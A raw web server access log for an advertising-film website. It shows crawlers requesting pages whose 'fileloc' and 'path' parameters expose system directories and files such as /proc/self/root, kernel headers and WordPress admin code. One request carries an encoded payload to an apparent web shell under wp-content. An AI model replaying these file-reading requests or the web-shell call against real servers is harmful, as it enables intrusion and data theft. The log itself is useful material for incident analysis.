216.73.216.50 - - [09/Nov/2025:01:13:52 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fscripts%2Fkconfig%2Fnconf.c&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fscripts%2Fkconfig HTTP/1.0" 200 13722 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.44.229.124 - - [09/Nov/2025:01:13:53 +0000] "GET /video/san-xuat-phim-quang-cao/?path=//etc/fonts/conf.avail HTTP/1.0" 200 5274 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:01:13:53 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fsnap%2Fcore20%2F2669%2Fusr%2Flib%2Fpython3.8%2Fasyncio%2Fconstants.py&path=%2F%2Fproc%2Fself%2Froot%2Fsnap%2Fcore20%2F2669%2Fusr%2Flib%2Fpython3.8%2Fasyncio HTTP/1.0" 200 3462 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:13:53 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory14/node0/cpu0 HTTP/1.0" 200 3649 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:13:54 +0000] "GET /q-~31IGCOfwlpwP97mjYjjyA7AJWQniptQN21540/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:54 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fscripts%2Fdtc%2Finclude-prefixes%2Fdt-bindings%2Farm HTTP/1.0" 200 3242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:54 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fvendor%2Fsymfony%2Fconfig%2FConfigCacheFactory.php&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fvendor%2Fsymfony%2Fconfig HTTP/1.0" 200 3460 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:54 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Fmultiprocessing%2Fpopen_spawn_posix.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Fmultiprocessing HTTP/1.0" 200 3554 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:55 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Ffs%2Fnfs%2Fblocklayout%2FMakefile&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Ffs%2Fnfs%2Fblocklayout HTTP/1.0" 200 3007 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:13:55 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory14/node0/memory3 HTTP/1.0" 200 3613 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:13:55 +0000] "GET /q-~129ZydFhBKTAxpcDGFswXc7gRQ1tYnZsL36012/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:56 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Ftools%2Fbpf%2FMakefile&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Ftools%2Fbpf HTTP/1.0" 200 3967 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:56 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Finclude%2Flinux%2Firqchip%2Fmxs.h&path=%2F%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Finclude%2Flinux%2Firqchip HTTP/1.0" 200 3042 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:56 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fthread-self%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214-generic%2Flib HTTP/1.0" 200 4023 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:57 +0000] "GET /our-works/tv-commercial/'?fileloc=%2Fvar%2Fwww%2Flamphim%2Fdata%2Fwww%2Flamphimquangcao.net%2Fwp-includes%2Fms-default-constants.php&path=%2Fvar%2Fwww%2Flamphim%2Fdata%2Fwww%2Flamphimquangcao.net%2Fwp-includes HTTP/1.0" 200 4476 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:13:57 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory14/node0/cpu1 HTTP/1.0" 200 3686 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.84.161.62 - - [09/Nov/2025:01:13:57 +0000] "GET /our-works/tvc-relax-gaba/?path=//var/lib/snapd/ssl HTTP/1.0" 200 3150 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:13:57 +0000] "GET /q-~149BitTW9NdJjEH4pYYcUegmaizfRrMND33292/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:58 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216-generic%2Finclude%2Fconfig%2Fcomedi%2Fmisc HTTP/1.0" 200 3211 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
114.119.143.51 - - [09/Nov/2025:01:13:58 +0000] "GET /q-~68nRzWU2XEytQ9UiUwgjdjs3jOs4Adct26139/ HTTP/1.0" 200 4760 "https://lamphimquangcao.net/sitemap257.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.216.50 - - [09/Nov/2025:01:13:58 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Ftools%2Fbpf%2Fbpftool HTTP/1.0" 200 3274 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:58 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214-generic%2Finclude%2Fconfig%2Ffanotify%2Faccess HTTP/1.0" 200 3217 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:59 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Ftask%2F3264%2Froot%2Flib%2Fpython3.8%2Funittest%2F__pycache__%2Fasync_case.cpython-38.pyc&path=%2F%2Fproc%2F3264%2Ftask%2F3264%2Froot%2Flib%2Fpython3.8%2Funittest%2F__pycache__ HTTP/1.0" 200 2905 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:13:59 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory13/node0/cpu1 HTTP/1.0" 200 3683 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:13:59 +0000] "GET /q-~258hAfFXZpgKEiqrFlfSHz6bnXa4HdXgk44713/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:14:00 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214-generic%2Ftools%2Ftesting%2Fselftests%2Fsize HTTP/1.0" 200 3217 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:00 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Ftools%2Fperf%2Farch%2Fsparc HTTP/1.0" 200 3238 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:00 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Finclude%2Flinux%2Fplatform_data%2Fmax197.h&path=%2F%2Fproc%2F3264%2Froot%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Finclude%2Flinux%2Fplatform_data HTTP/1.0" 200 3270 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:01 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Flib%2Fpython3%2Fdist-packages%2Fhamcrest%2Fcore%2Fcore%2Fissame.py&path=%2F%2Fproc%2F3264%2Froot%2Flib%2Fpython3%2Fdist-packages%2Fhamcrest%2Fcore%2Fcore HTTP/1.0" 200 3361 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.197.82.195 - - [09/Nov/2025:01:14:01 +0000] "GET /our-works/intracom-riverside/?path=//sys/class/scsi_generic HTTP/1.0" 200 3140 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:01:14:01 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory14/node0/memory1 HTTP/1.0" 200 3613 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:14:02 +0000] "GET /q-~78XmOTB73BRIjEHyuYbjEPkYQ3rANODI46865/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:14:02 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Flib%2Fpython3.8%2Fencodings%2Fcharmap.py&path=%2F%2Flib%2Fpython3.8%2Fencodings HTTP/1.0" 200 3477 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:02 +0000] "GET /our-works/tv-commercial/'?fileloc=%2Fvar%2Fwww%2Flamphim%2Fdata%2Fwww%2Flamphimquangcao.net%2Fwp-admin%2Fjs%2Fpassword-strength-meter.min.js&path=%2Fvar%2Fwww%2Flamphim%2Fdata%2Fwww%2Flamphimquangcao.net%2Fwp-admin%2Fjs HTTP/1.0" 200 3519 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:03 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fshare%2Fperl%2F5.30%2FNet%2FPOP3.pm&path=%2F%2Fusr%2Fshare%2Fperl%2F5.30%2FNet HTTP/1.0" 200 10181 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:04 +0000] "GET /our-works/tv-commercial/'?fileloc=%2Fvar%2Fwww%2Flamphim%2Fdata%2Fwww%2Flamphimquangcao.net%2Fwp-admin%2Fincludes%2Fclass-wp-filesystem-base.php&path=%2Fvar%2Fwww%2Flamphim%2Fdata%2Fwww%2Flamphimquangcao.net%2Fwp-admin%2Fincludes HTTP/1.0" 200 8303 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:04 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fx86_64-linux-gnu%2Flibulockmgr.so.1&path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fx86_64-linux-gnu HTTP/1.0" 200 2884 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:04 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fsos%2Fhelp HTTP/1.0" 200 3304 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:14:05 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory13/node0/memory6 HTTP/1.0" 200 3611 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:14:05 +0000] "GET /q-~142BCGlgJYRnBUyebqYMt5NcftdoNZd0T39855/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:14:05 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214-generic%2Farch%2Fxtensa%2Fvariants%2Ftest_kc705_be HTTP/1.0" 200 3206 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:05 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fdovecot%2Flmtp&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fdovecot HTTP/1.0" 200 2858 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.203.237.170 - - [09/Nov/2025:01:14:05 +0000] "GET /our-works/intracom-riverside/?path=//sys/firmware/dmi HTTP/1.0" 200 3141 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:01:14:06 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fshare%2Fvim%2Fvim81%2Fftplugin%2Fsshconfig.vim&path=%2F%2Fusr%2Fshare%2Fvim%2Fvim81%2Fftplugin HTTP/1.0" 200 3122 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:06 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fdrivers%2Ffsi%2FMakefile&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fdrivers%2Ffsi HTTP/1.0" 200 3010 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:07 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2FPyGObject-3.36.0.egg-info HTTP/1.0" 200 3430 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:14:07 +0000] "GET /q-~234AJfaKPHg6cHiwgIMcfgrkVMN2TElrY34915/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:14:07 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fpyrsistent-0.15.5.egg-info HTTP/1.0" 200 3381 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:14:08 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory12/node0/memory0 HTTP/1.0" 200 3611 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:14:08 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Finclude%2Fconfig%2Fsensors%2Fmax1619.h&path=%2F%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Finclude%2Fconfig%2Fsensors HTTP/1.0" 200 2887 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:08 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Flib%2Fx86_64-linux-gnu%2Fguile%2F2.2%2Fccache%2Fweb%2Fclient.go&path=%2F%2Fusr%2Flib%2Fx86_64-linux-gnu%2Fguile%2F2.2%2Fccache%2Fweb HTTP/1.0" 200 2877 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:08 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Flib%2Fmodules%2F5.4.0-214-generic%2Fkernel%2Fcrypto%2Fasync_tx HTTP/1.0" 200 3399 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:09 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Flib%2Fpython3%2Fdist-packages%2Fentrypoints.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Flib%2Fpython3%2Fdist-packages HTTP/1.0" 200 5219 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.248.20 - - [09/Nov/2025:01:14:09 +0000] "GET / HTTP/1.0" 200 4759 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
18.232.12.157 - - [09/Nov/2025:01:14:10 +0000] "GET /our-works/tvc-calci/?path=//lib/byobu/include/__pycache__ HTTP/1.0" 200 3242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:14:10 +0000] "GET /q-~120hWFEkNgYnMPcP8n0mHqBnSjuntVwQy21675/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:14:10 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Flib%2Fpython3%2Fdist-packages%2Fhttplib2%2F__init__.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Flib%2Fpython3%2Fdist-packages%2Fhttplib2 HTTP/1.0" 200 21356 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:11 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fsound%2Fusb HTTP/1.0" 200 3505 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:11 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fshare%2Fdoc%2Fapache2%2FREADME.backtrace&path=%2F%2Fusr%2Fshare%2Fdoc%2Fapache2 HTTP/1.0" 200 3444 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:12 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fshare%2Fperl%2F5.30%2FFile%2FCompare.pm&path=%2F%2Fusr%2Fshare%2Fperl%2F5.30%2FFile HTTP/1.0" 200 4587 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.248.20 - - [09/Nov/2025:01:11:51 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635343330392p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323635303730392q3961613130373234343838323933663462363534326135383661643938333464222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
74.7.227.189 - - [09/Nov/2025:01:14:12 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory14/node0/memory3 HTTP/1.0" 200 3615 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:14:13 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Finclude%2Fconfig%2Flattice%2Fecp3 HTTP/1.0" 200 3228 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:13 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fdrivers%2Fvideo%2Ffbdev%2Fomap HTTP/1.0" 200 3266 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:14:14 +0000] "GET /q-~157tOiFqwfoDQMohiHINYUm8w0LLCZBuz43590/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:14:14 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Fshare%2Fdoc%2Ftcpdump%2FREADME.Debian&path=%2F%2Fusr%2Fshare%2Fdoc%2Ftcpdump HTTP/1.0" 200 3053 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:15 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Fdoc%2Fpython-apt-common%2Fchangelog.gz&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Fdoc%2Fpython-apt-common HTTP/1.0" 200 2883 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
34.194.226.74 - - [09/Nov/2025:01:14:15 +0000] "GET /our-works/tvc-calci/?path=//sys/block/loop0/trace HTTP/1.0" 200 3311 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:01:14:15 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Farch%2Farm%2Fmach-ux500 HTTP/1.0" 200 3254 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
